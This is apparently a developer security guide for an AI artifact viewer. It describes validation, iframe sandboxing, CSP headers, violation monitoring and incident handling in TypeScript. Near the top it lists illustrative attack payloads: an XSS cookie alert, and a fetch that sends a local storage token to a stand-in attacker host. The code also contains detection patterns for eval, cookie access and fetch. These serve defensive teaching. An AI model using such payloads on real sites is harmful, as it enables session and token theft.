Viewer Security Guide
Security Overview
The Bike4Mind viewer system handles potentially untrusted content from AI-generated artifacts, user uploads, and external sources. This guide covers the comprehensive security architecture designed to protect against XSS, code injection, and other security threats.
Threat Model
Potential Attack Vectors
- Cross-Site Scripting (XSS)
  - Malicious scripts in HTML artifacts
  - JavaScript injection in React components
  - CSS-based attacks in style attributes
- Code Injection
  - Arbitrary code execution in React sandbox
  - Node.js module injection attempts
  - Template injection in server-side rendering
- Resource Exhaustion
  - Infinite loops in React components
  - Memory bombs in large data processing
  - CPU-intensive operations blocking UI
- Data Exfiltration
  - Unauthorized API calls from sandboxed content
  - Credential harvesting attempts
  - Cross-origin data leakage
- Content Spoofing
  - UI redressing attacks
  - Phishing via crafted content
  - Misleading error messages
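To make these vectors concrete, the hypothetical payloads below (illustrative only, not taken from real artifacts) show what a few of them look like in practice; each should be caught by the validation and sandboxing layers described in the rest of this guide.

// Hypothetical payload samples for the vectors above (illustrative only).
const samplePayloads: Record<string, string> = {
  xss: '<img src="x" onerror="alert(document.cookie)">',
  codeInjection: 'new Function("return fetch(\'/internal/api\')")()',
  resourceExhaustion: 'while (true) { /* block the render loop */ }',
  dataExfiltration: 'fetch("https://attacker.example/collect", { method: "POST", body: localStorage.token })',
};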
Security Architecture
Multi-Layer Defense Strategy
graph TB
    subgraph "Input Layer"
        I1[User Input]
        I2[AI Generated Content]
        I3[File Uploads]
    end
    subgraph "Validation Layer"
        V1[Schema Validation]
        V2[Content Sanitization]
        V3[Size Limits]
        V4[Type Checking]
    end
    subgraph "Sandbox Layer"
        S1[Iframe Sandboxing]
        S2[CSP Enforcement]
        S3[Same-Origin Policy]
        S4[Resource Restrictions]
    end
    subgraph "Runtime Layer"
        R1[Error Boundaries]
        R2[Resource Monitoring]
        R3[Timeout Protection]
        R4[Memory Limits]
    end
    subgraph "Output Layer"
        O1[Safe Rendering]
        O2[Escaped Content]
        O3[Filtered Messages]
    end
    I1 --> V1
    I2 --> V2
    I3 --> V3
    V1 --> S1
    V2 --> S2
    V3 --> S3
    S1 --> R1
    S2 --> R2
    R1 --> O1
    R2 --> O2
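Read top to bottom, the diagram is a pipeline: content must clear each layer before it is rendered. A minimal sketch of that flow, composed from the helpers defined later in this guide (the processArtifact wrapper itself is an assumption, not an existing function):

// Illustrative composition of the layers above; only validateSecureContent and
// generateSecureSandbox appear in this guide, the wrapper is assumed.
const processArtifact = (content: string, type: 'html' | 'react' | 'svg') => {
  // Validation layer: schema checks, sanitization, size limits
  const validation = validateSecureContent({ content, type });
  if (!validation.isValid) {
    return { ok: false as const, errors: validation.errors };
  }
  // Sandbox layer: wrap the sanitized content in a locked-down iframe document
  const sandboxHTML = generateSecureSandbox(validation.sanitizedContent, type);
  // Runtime and output layers are handled by the viewer components shown below
  // (error boundaries, timeouts, escaped error messages).
  return { ok: true as const, sandboxHTML };
};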
Content Validation
Input Sanitization
import DOMPurify from 'dompurify';
import { z } from 'zod';
// Comprehensive content validation schema
const SecureContentSchema = z.object({
content: z.string()
.min(1, 'Content cannot be empty')
.max(5000000, 'Content exceeds maximum size') // 5MB limit
.refine(
(content) => !content.includes('<script>'),
'Script tags are not allowed'
)
.refine(
(content) => !/<iframe(?!\s+sandbox=)/i.test(content),
'Unsandboxed iframes are not allowed'
),
type: z.enum(['html', 'react', 'svg', 'markdown']),
metadata: z.object({
dependencies: z.array(z.string()).optional(),
allowedTags: z.array(z.string()).optional(),
maxExecutionTime: z.number().max(30000).optional(), // 30 second limit
}).optional(),
});
export const validateSecureContent = (input: unknown): ValidationResult => {
try {
const validatedInput = SecureContentSchema.parse(input);
// Additional security checks
const securityIssues: string[] = [];
// Check for suspicious patterns
const suspiciousPatterns = [
/eval\s*\(/gi,
/Function\s*\(/gi,
/document\.cookie/gi,
/localStorage/gi,
/sessionStorage/gi,
/window\.location/gi,
/fetch\s*\(/gi,
/XMLHttpRequest/gi,
/import\s*\(/gi,
/require\s*\(/gi,
];
suspiciousPatterns.forEach(pattern => {
if (pattern.test(validatedInput.content)) {
securityIssues.push(`Potentially dangerous pattern detected: ${pattern.source}`);
}
});
// Sanitize HTML content
if (validatedInput.type === 'html') {
const sanitized = DOMPurify.sanitize(validatedInput.content, {
ALLOWED_TAGS: validatedInput.metadata?.allowedTags || ['div', 'span', 'p', 'h1', 'h2', 'h3'],
ALLOWED_ATTR: ['class', 'id', 'style'],
FORBID_TAGS: ['script', 'object', 'embed', 'form', 'input'],
});
if (sanitized !== validatedInput.content) {
securityIssues.push('Content was modified during sanitization');
}
validatedInput.content = sanitized;
}
return {
isValid: securityIssues.length === 0,
errors: securityIssues,
sanitizedContent: validatedInput.content,
};
} catch (error) {
return {
isValid: false,
errors: [error instanceof Error ? error.message : 'Validation failed'],
sanitizedContent: '',
};
}
};
interface ValidationResult {
isValid: boolean;
errors: string[];
sanitizedContent: string;
}
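A brief usage example: content containing a script tag is rejected by the schema refinement before sanitization even runs, and the caller receives the reasons in errors.

// Example usage (illustrative input):
const result = validateSecureContent({
  content: '<div class="card"><p>Hello</p><script>alert(1)</script></div>',
  type: 'html',
});
// result.isValid === false: the schema refinement rejects the <script> tag,
// so the content never reaches DOMPurify.
if (!result.isValid) {
  console.warn('Rejected artifact content:', result.errors);
}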
React Component Validation
import * as ts from 'typescript';
import { transform } from '@babel/standalone';
export const validateReactComponent = (code: string): ReactValidationResult => {
const errors: string[] = [];
const warnings: string[] = [];
try {
// TypeScript compilation check
const compilerOptions: ts.CompilerOptions = {
target: ts.ScriptTarget.ES2020,
module: ts.ModuleKind.ESNext,
jsx: ts.JsxEmit.React,
strict: true,
noEmit: true,
};
const sourceFile = ts.createSourceFile(
'component.tsx',
code,
ts.ScriptTarget.ES2020,
true,
ts.ScriptKind.TSX
);
const program = ts.createProgram(['component.tsx'], compilerOptions, {
  getSourceFile: (fileName) => fileName === 'component.tsx' ? sourceFile : undefined,
  // Minimal CompilerHost; getDefaultLibFileName is required by the interface
  getDefaultLibFileName: () => 'lib.d.ts',
  writeFile: () => {},
  getCurrentDirectory: () => '',
  getDirectories: () => [],
  fileExists: () => true,
  readFile: () => '',
  getCanonicalFileName: (fileName) => fileName,
  useCaseSensitiveFileNames: () => true,
  getNewLine: () => '\n',
});
const diagnostics = ts.getPreEmitDiagnostics(program);
diagnostics.forEach(diagnostic => {
if (diagnostic.file && diagnostic.start !== undefined) {
const message = ts.flattenDiagnosticMessageText(diagnostic.messageText, '\n');
if (diagnostic.category === ts.DiagnosticCategory.Error) {
errors.push(message);
} else {
warnings.push(message);
}
}
});
// Security-specific checks
const securityChecks = [
{
pattern: /dangerouslySetInnerHTML/g,
message: 'dangerouslySetInnerHTML usage detected - potential XSS risk',
level: 'error' as const,
},
{
pattern: /eval\s*\(/g,
message: 'eval() usage detected - code injection risk',
level: 'error' as const,
},
{
pattern: /window\./g,
message: 'Direct window access detected',
level: 'warning' as const,
},
{
pattern: /document\./g,
message: 'Direct document access detected',
level: 'warning' as const,
},
];
securityChecks.forEach(check => {
const matches = code.match(check.pattern);
if (matches) {
const message = `${check.message} (${matches.length} occurrence${matches.length > 1 ? 's' : ''})`;
if (check.level === 'error') {
errors.push(message);
} else {
warnings.push(message);
}
}
});
// Check for required exports
if (!code.includes('export default') && !code.includes('export {')) {
errors.push('Component must have a default export');
}
// Babel transformation test
try {
transform(code, {
presets: ['react', 'typescript'],
filename: 'component.tsx',
});
} catch (babelError) {
errors.push(`Babel transformation failed: ${babelError instanceof Error ? babelError.message : String(babelError)}`);
}
return {
isValid: errors.length === 0,
errors,
warnings,
hasSecurityIssues: errors.some(e =>
e.includes('XSS') ||
e.includes('injection') ||
e.includes('dangerouslySetInnerHTML') ||
e.includes('eval')
),
};
} catch (error) {
return {
isValid: false,
errors: [error instanceof Error ? error.message : 'Unknown validation error'],
warnings: [],
hasSecurityIssues: true,
};
}
};
interface ReactValidationResult {
isValid: boolean;
errors: string[];
warnings: string[];
hasSecurityIssues: boolean;
}
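For example, a component that relies on dangerouslySetInnerHTML fails validation before it ever reaches the sandbox:

// Example usage (illustrative component):
const verdict = validateReactComponent(`
  export default function Preview({ html }: { html: string }) {
    return <div dangerouslySetInnerHTML={{ __html: html }} />;
  }
`);
// verdict.isValid === false and verdict.hasSecurityIssues === true:
// the dangerouslySetInnerHTML check reports an error-level finding.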
Sandboxing Implementation
Secure Iframe Configuration
const generateSecureSandbox = (content: string, type: ArtifactType): string => {
// Locked-down Content Security Policy for the sandbox document.
// Note: 'unsafe-inline' and 'unsafe-eval' are required for in-iframe Babel/React
// execution, so isolation relies on the iframe sandbox and connect-src 'none'.
const cspPolicy = [
"default-src 'none'",
"script-src 'unsafe-inline' 'unsafe-eval' https://unpkg.com",
"style-src 'unsafe-inline' https://cdn.tailwindcss.com",
"img-src 'self' data: blob:",
"font-src https://fonts.googleapis.com https://fonts.gstatic.com",
"connect-src 'none'", // No external connections
"form-action 'none'", // No form submissions
"frame-ancestors 'none'", // Prevent embedding
"base-uri 'none'", // Prevent base URL manipulation
].join('; ');
const sandboxHTML = `<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta http-equiv="Content-Security-Policy" content="${cspPolicy}">
<meta http-equiv="X-Frame-Options" content="DENY">
<meta http-equiv="X-Content-Type-Options" content="nosniff">
<title>Secure Sandbox</title>
<style>
* { box-sizing: border-box; }
body {
margin: 0;
padding: 16px;
font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', sans-serif;
background: white;
overflow-wrap: break-word;
}
.error {
color: #d32f2f;
background: #ffebee;
padding: 16px;
border-radius: 4px;
border-left: 4px solid #d32f2f;
font-family: monospace;
white-space: pre-wrap;
margin: 16px 0;
}
.sandbox-info {
position: fixed;
top: 8px;
right: 8px;
background: rgba(0,0,0,0.1);
padding: 4px 8px;
border-radius: 4px;
font-size: 12px;
opacity: 0.7;
pointer-events: none;
}
</style>
</head>
<body>
<div class="sandbox-info">Sandboxed Content</div>
<div id="root"></div>
<div id="error-container"></div>
<script>
// Disable potentially dangerous global functions, keeping a private
// reference to Function for the sandbox executor defined below
const __SandboxFunction = window.Function;
window.eval = undefined;
window.Function = undefined;
// Error handling and reporting
const errorContainer = document.getElementById('error-container');
const reportError = (message, source = 'sandbox') => {
console.error('Sandbox Error:', message);
// Report to parent frame
try {
parent.postMessage({
type: 'sandbox_error',
message: message,
source: source,
timestamp: Date.now(),
}, '*');
} catch (e) {
console.error('Failed to report error to parent:', e);
}
// Show error in sandbox
const errorDiv = document.createElement('div');
errorDiv.className = 'error';
errorDiv.textContent = \`\${source.toUpperCase()} ERROR: \${message}\`;
errorContainer.appendChild(errorDiv);
};
// Global error handlers
window.addEventListener('error', (event) => {
reportError(event.error?.message || event.message, 'runtime');
});
window.addEventListener('unhandledrejection', (event) => {
reportError(event.reason?.message || String(event.reason), 'promise');
});
// Execution timeout protection
const executionTimeout = setTimeout(() => {
reportError('Execution timeout - component took too long to render', 'timeout');
}, 10000); // 10 second timeout
try {
${generateSandboxContent(content, type)}
// Clear timeout on successful execution
clearTimeout(executionTimeout);
// Report successful load
parent.postMessage({
type: 'sandbox_ready',
timestamp: Date.now(),
}, '*');
} catch (error) {
clearTimeout(executionTimeout);
reportError(error.message || 'Unknown execution error', 'execution');
}
</script>
</body>
</html>`;
return sandboxHTML;
};
const generateSandboxContent = (content: string, type: ArtifactType): string => {
switch (type) {
case 'react':
return generateReactSandboxContent(content);
case 'html':
return generateHTMLSandboxContent(content);
case 'svg':
return generateSVGSandboxContent(content);
default:
throw new Error(`Unsupported sandbox type: ${type}`);
}
};
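The generated document is typically mounted via the iframe srcDoc attribute rather than a URL, so it runs with an opaque origin and only the permissions granted by the sandbox attribute. A minimal sketch (the SandboxFrame component is assumed, not an existing viewer):

// Minimal mounting sketch; SandboxFrame is an assumption for illustration.
const SandboxFrame: React.FC<{ content: string; type: ArtifactType }> = ({ content, type }) => (
  <iframe
    title="Sandboxed artifact"
    // allow-scripts without allow-same-origin keeps the document on an opaque origin
    sandbox="allow-scripts"
    srcDoc={generateSecureSandbox(content, type)}
    style={{ border: 'none', width: '100%', height: '100%' }}
  />
);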
React Sandbox Implementation
const generateReactSandboxContent = (componentCode: string): string => {
return `
// React sandbox environment
const { createElement, useState, useEffect, useRef, useMemo, useCallback } = React;
// Restricted require function
const require = (module) => {
const allowedModules = {
'react': React,
'lucide-react': typeof LucideReact !== 'undefined' ? LucideReact : {},
'recharts': typeof Recharts !== 'undefined' ? Recharts : {},
// Add other allowed modules
};
if (!allowedModules.hasOwnProperty(module)) {
throw new Error(\`Module "\${module}" is not allowed in sandbox\`);
}
return allowedModules[module];
};
// Component execution with error boundaries
try {
// Transform and execute component code
const transformedCode = \`${componentCode
.replace(/import\s+.*?from\s+['"]react['"];?/g, '// React imported globally')
.replace(/import\s+(.+?)\s+from\s+['"](.+?)['"];?/g, 'const $1 = require("$2");')
.replace(/export\s+default\s+/g, 'const __COMPONENT__ = ')}\`;
// Babel transformation
const babelResult = Babel.transform(transformedCode, {
presets: ['react'],
plugins: [
// Custom plugin to restrict dangerous operations
function restrictDangerousOperations() {
return {
visitor: {
CallExpression(path) {
const callee = path.node.callee;
if (callee.type === 'Identifier' &&
['eval', 'Function', 'setTimeout', 'setInterval'].includes(callee.name)) {
throw new Error(\`\${callee.name} is not allowed in sandbox\`);
}
},
MemberExpression(path) {
const object = path.node.object;
const property = path.node.property;
if (object.type === 'Identifier' && object.name === 'window' &&
property.type === 'Identifier' &&
['localStorage', 'sessionStorage', 'location'].includes(property.name)) {
throw new Error(\`window.\${property.name} is not allowed in sandbox\`);
}
}
}
};
}
]
});
// Execute in controlled environment
const executionScope = {
React,
useState,
useEffect,
useRef,
useMemo,
useCallback,
require,
console,
};
// Use the Function reference captured before globals were disabled in the sandbox shell
const executeInScope = new __SandboxFunction(
...Object.keys(executionScope),
babelResult.code + '; return typeof __COMPONENT__ !== "undefined" ? __COMPONENT__ : null;'
);
const Component = executeInScope(...Object.values(executionScope));
if (!Component) {
throw new Error('No valid React component found');
}
// Render component with error boundary
const root = ReactDOM.createRoot(document.getElementById('root'));
const ErrorBoundary = ({ children }) => {
const [hasError, setHasError] = React.useState(false);
const [error, setError] = React.useState(null);
React.useEffect(() => {
const handleError = (event) => {
setHasError(true);
setError(event.error || event.reason);
};
window.addEventListener('error', handleError);
window.addEventListener('unhandledrejection', handleError);
return () => {
window.removeEventListener('error', handleError);
window.removeEventListener('unhandledrejection', handleError);
};
}, []);
if (hasError) {
return React.createElement('div', {
className: 'error'
}, 'Component Error: ' + (error?.message || 'Unknown error'));
}
return children;
};
root.render(
React.createElement(ErrorBoundary, null,
React.createElement(Component)
)
);
} catch (error) {
throw new Error('Component execution failed: ' + error.message);
}
`;
};
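The HTML and SVG branches referenced by generateSandboxContent are not shown in this guide. A plausible minimal sketch, assuming both receive content that has already passed validateSecureContent (embedAsJS is also an assumption), simply injects the sanitized markup into the root node:

// Assumed sketches of the HTML/SVG branches (not the actual implementations).
const embedAsJS = (value: string): string =>
  // Escape "<" so a literal "</script>" in content cannot close the sandbox script tag
  JSON.stringify(value).replace(/</g, '\\u003c');

const generateHTMLSandboxContent = (html: string): string => `
  document.getElementById('root').innerHTML = ${embedAsJS(html)};
`;

const generateSVGSandboxContent = (svg: string): string => `
  const container = document.getElementById('root');
  container.innerHTML = ${embedAsJS(svg)};
  if (!container.querySelector('svg')) {
    throw new Error('No <svg> element found in artifact content');
  }
`;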
Security Monitoring
Runtime Security Monitoring
class SecurityMonitor {
private static instance: SecurityMonitor;
private violations: SecurityViolation[] = [];
private listeners: SecurityListener[] = [];
static getInstance(): SecurityMonitor {
if (!SecurityMonitor.instance) {
SecurityMonitor.instance = new SecurityMonitor();
}
return SecurityMonitor.instance;
}
recordViolation(violation: SecurityViolation): void {
this.violations.push({
...violation,
timestamp: Date.now(),
sessionId: this.getCurrentSessionId(),
});
// Alert listeners
this.listeners.forEach(listener => {
try {
listener(violation);
} catch (error) {
console.error('Security listener error:', error);
}
});
// Log critical violations
if (violation.severity === 'critical') {
console.error('CRITICAL SECURITY VIOLATION:', violation);
// Could send to monitoring service
this.reportCriticalViolation(violation);
}
}
addListener(listener: SecurityListener): () => void {
this.listeners.push(listener);
return () => {
const index = this.listeners.indexOf(listener);
if (index > -1) {
this.listeners.splice(index, 1);
}
};
}
getViolationReport(): SecurityReport {
const now = Date.now();
const last24Hours = this.violations.filter(v =>
now - v.timestamp < 24 * 60 * 60 * 1000
);
return {
totalViolations: this.violations.length,
last24Hours: last24Hours.length,
criticalViolations: this.violations.filter(v => v.severity === 'critical').length,
commonViolations: this.getMostCommonViolations(),
timeRange: {
start: this.violations[0]?.timestamp || now,
end: now,
},
};
}
private getCurrentSessionId(): string {
// Implementation to get current session ID
return 'session-' + Date.now();
}
private async reportCriticalViolation(violation: SecurityViolation): Promise<void> {
try {
// Report to monitoring service
await fetch('/api/security/violations', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify(violation),
});
} catch (error) {
console.error('Failed to report security violation:', error);
}
}
private getMostCommonViolations(): Array<{ type: string; count: number }> {
const counts = this.violations.reduce((acc, violation) => {
acc[violation.type] = (acc[violation.type] || 0) + 1;
return acc;
}, {} as Record<string, number>);
return Object.entries(counts)
.sort(([, a], [, b]) => b - a)
.slice(0, 10)
.map(([type, count]) => ({ type, count }));
}
}
interface SecurityViolation {
type: 'xss_attempt' | 'code_injection' | 'resource_abuse' | 'csp_violation' | 'sandbox_escape';
severity: 'low' | 'medium' | 'high' | 'critical';
message: string;
source: string;
artifactId?: string;
userAgent?: string;
timestamp?: number;
sessionId?: string;
}
type SecurityListener = (violation: SecurityViolation) => void;
interface SecurityReport {
totalViolations: number;
last24Hours: number;
criticalViolations: number;
commonViolations: Array<{ type: string; count: number }>;
timeRange: { start: number; end: number };
}
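Outside of React components, the monitor can also be used directly, for example to surface violations in an operations dashboard or a debug console:

// Example usage (illustrative):
const monitor = SecurityMonitor.getInstance();

const unsubscribe = monitor.addListener((violation) => {
  if (violation.severity === 'critical' || violation.severity === 'high') {
    console.warn('Security violation:', violation.type, violation.message);
  }
});

monitor.recordViolation({
  type: 'csp_violation',
  severity: 'medium',
  message: 'Inline style blocked in sandboxed artifact',
  source: 'csp_report_handler',
});

console.log(monitor.getViolationReport()); // totals, last 24 hours, most common types
unsubscribe();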
Usage in Viewers
const SecureReactViewer: React.FC<ArtifactViewerProps<ReactArtifact>> = ({
artifact,
onError
}) => {
const securityMonitor = SecurityMonitor.getInstance();
useEffect(() => {
// Set up security monitoring
const removeListener = securityMonitor.addListener((violation) => {
if (violation.artifactId === artifact.id) {
onError?.(`Security violation: ${violation.message}`);
}
});
return removeListener;
}, [artifact.id, onError, securityMonitor]);
// Message handler for sandbox communications
useEffect(() => {
const handleMessage = (event: MessageEvent) => {
if (event.data.type === 'sandbox_error') {
securityMonitor.recordViolation({
type: 'sandbox_escape',
severity: 'high',
message: event.data.message,
source: 'react_sandbox',
artifactId: artifact.id,
});
}
};
window.addEventListener('message', handleMessage);
return () => window.removeEventListener('message', handleMessage);
}, [artifact.id, securityMonitor]);
return (
<SecurityBoundary artifactId={artifact.id}>
<ReactArtifactViewer artifact={artifact} onError={onError} />
</SecurityBoundary>
);
};
const SecurityBoundary: React.FC<{
children: React.ReactNode;
artifactId: string;
}> = ({ children, artifactId }) => {
const securityMonitor = SecurityMonitor.getInstance();
useEffect(() => {
// Monitor for performance anomalies that might indicate attacks
const startTime = performance.now();
return () => {
const endTime = performance.now();
const executionTime = endTime - startTime;
if (executionTime > 30000) { // 30 seconds
securityMonitor.recordViolation({
type: 'resource_abuse',
severity: 'medium',
message: `Excessive execution time: ${executionTime}ms`,
source: 'security_boundary',
artifactId,
});
}
};
}, [artifactId, securityMonitor]);
return <>{children}</>;
};
Security Best Practices
Development Guidelines
- Always Validate Input
// ❌ Never trust user input
const dangerousRender = (content: string) => (
<div dangerouslySetInnerHTML={{ __html: content }} />
);
// ✅ Always validate and sanitize
const safeRender = (content: string) => {
const validation = validateSecureContent({ content, type: 'html' });
if (!validation.isValid) {
return <ErrorDisplay errors={validation.errors} />;
}
return <div dangerouslySetInnerHTML={{ __html: validation.sanitizedContent }} />;
};
- Use Sandboxes for Untrusted Content
// ✅ Always sandbox untrusted code execution
const SecureCodeViewer = ({ code }: { code: string }) => (
  <iframe
    sandbox="allow-scripts"
    srcDoc={generateSecureSandbox(code, 'react')}
    style={{ border: 'none', width: '100%', height: '100%' }}
  />
);
- Implement Proper Error Boundaries
// ✅ Catch and contain errors securely
class SecurityErrorBoundary extends React.Component<
  { children: React.ReactNode },
  { hasError: boolean }
> {
  state = { hasError: false };
  static getDerivedStateFromError() {
    // Switch to the fallback UI instead of re-rendering the failing content
    return { hasError: true };
  }
  componentDidCatch(error: Error, errorInfo: React.ErrorInfo) {
    // Don't expose sensitive error details
    const safeError = this.sanitizeError(error);
    this.reportSecurityError(safeError);
  }
  private sanitizeError(error: Error): SafeError {
    return {
      message: 'A security error occurred',
      type: 'security_boundary_error',
      timestamp: Date.now(),
    };
  }
  render() {
    return this.state.hasError ? <div>Content blocked due to a security error.</div> : this.props.children;
  }
}
- Monitor Resource Usage
const useResourceMonitoring = (artifactId: string) => {
useEffect(() => {
const monitor = new PerformanceObserver((list) => {
const entries = list.getEntries();
entries.forEach(entry => {
if (entry.duration > 5000) { // 5 second threshold
SecurityMonitor.getInstance().recordViolation({
type: 'resource_abuse',
severity: 'medium',
message: `Long task detected: ${entry.duration}ms`,
source: 'performance_monitor',
artifactId,
});
}
});
});
monitor.observe({ entryTypes: ['longtask'] });
return () => monitor.disconnect();
}, [artifactId]);
};
Deployment Security
- Content Security Policy Headers (wiring sketch shown after this list)
// Add to your Next.js configuration
const securityHeaders = [
{
key: 'Content-Security-Policy',
value: [
"default-src 'self'",
"script-src 'self' 'unsafe-inline' 'unsafe-eval' https://unpkg.com",
"style-src 'self' 'unsafe-inline' https://fonts.googleapis.com",
"img-src 'self' data: blob: https:",
"font-src 'self' https://fonts.gstatic.com",
"connect-src 'self'",
"frame-src 'self' blob:",
].join('; '),
},
{
key: 'X-Frame-Options',
value: 'DENY',
},
{
key: 'X-Content-Type-Options',
value: 'nosniff',
},
];
- Regular Security Audits
# Run security audits regularly
npm audit --audit-level high
pnpm audit --audit-level high
# Check for known vulnerabilities
npx snyk test
# Inspect the bundle for unexpected dependencies (requires an exported webpack stats file)
npx webpack-bundle-analyzer stats.json
- Dependency Management
{
"overrides": {
"vulnerable-package": "safe-version"
},
"resolutions": {
"another-vulnerable-package": "safe-version"
}
}
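As noted in the first item above, the securityHeaders array only takes effect once it is returned from the headers() hook; a minimal next.config.js sketch (the route matcher and file layout are assumptions):

// next.config.js (sketch, assuming securityHeaders is defined as in the first item)
module.exports = {
  async headers() {
    return [
      {
        source: '/:path*', // apply to every route
        headers: securityHeaders,
      },
    ];
  },
};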
Incident Response
Security Incident Handling
class SecurityIncidentHandler {
async handleIncident(incident: SecurityIncident): Promise<void> {
// 1. Immediate containment
await this.containThreat(incident);
// 2. Assessment
const impact = await this.assessImpact(incident);
// 3. Notification
await this.notifyStakeholders(incident, impact);
// 4. Remediation
await this.remediateThreat(incident);
// 5. Documentation
await this.documentIncident(incident, impact);
}
private async containThreat(incident: SecurityIncident): Promise<void> {
switch (incident.type) {
case 'xss_attempt':
// Disable affected viewer
// Clear potentially malicious content
break;
case 'code_injection':
// Terminate sandbox execution
// Block further attempts from source
break;
case 'resource_abuse':
// Throttle or block resource-intensive operations
break;
}
}
}
interface SecurityIncident {
id: string;
type: SecurityViolation['type'];
severity: SecurityViolation['severity'];
timestamp: number;
affectedComponents: string[];
details: Record<string, unknown>;
}
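In practice the handler is driven by the monitor described earlier; the sketch below wires the two together (the escalation rule and incident id format are assumptions):

// Illustrative wiring of SecurityMonitor to the incident handler (assumed policy).
const incidentHandler = new SecurityIncidentHandler();

SecurityMonitor.getInstance().addListener((violation) => {
  // Only high/critical violations are escalated to full incidents (assumption)
  if (violation.severity !== 'high' && violation.severity !== 'critical') return;

  void incidentHandler.handleIncident({
    id: `incident-${Date.now()}`,
    type: violation.type,
    severity: violation.severity,
    timestamp: Date.now(),
    affectedComponents: violation.artifactId ? [violation.artifactId] : [],
    details: { message: violation.message, source: violation.source },
  });
});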
The measures described in this guide provide layered protection for the viewer system while preserving functionality and user experience. Review and update them regularly to address evolving threats.